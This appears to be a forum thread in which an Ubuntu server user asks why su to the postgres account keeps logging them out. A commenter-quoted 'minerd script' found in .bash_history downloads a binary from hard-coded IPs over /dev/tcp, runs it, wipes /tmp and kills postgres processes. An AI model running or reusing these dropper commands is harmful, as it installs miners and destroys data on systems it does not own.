# postgres user automatically logged out

Tags: linux, postgresql, ubuntu

I have Ubuntu server. Usually I log in using user root. Then after I switch to user postgres using command:

```
su - postgres
```

But in last couple days, every time I log into user postgres using command above, it automatically logs out and back to user root.

Anyone have problem like me?
Thank you.

Comment: Maybe there is something weird in `~postgres/.bash_profile`?

Comment: Hi, @LaurenzAlbe, I didn't find any that file. But I found this in .bash_history a script `#!/usr/bin/env bash
#minerd script
host='45.76.146.166';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5555 > $target && chmod +x $target &&  nohup $target &
#!/usr/bin/env bash
#minerd script
rm -rf /tmp/*
killall -u postgres
host='45.77.46.171';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup  $target &`

Comment: What does the /etc/passwd line for postgres look like? Specifically the last column?

Comment: Hi @ScottMarlowe, here the last columnfor postgres user `postgres:x:106:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash`

Comment: Well that looks ok. Anything in your logs in /var/log when you try to sudo to postgres?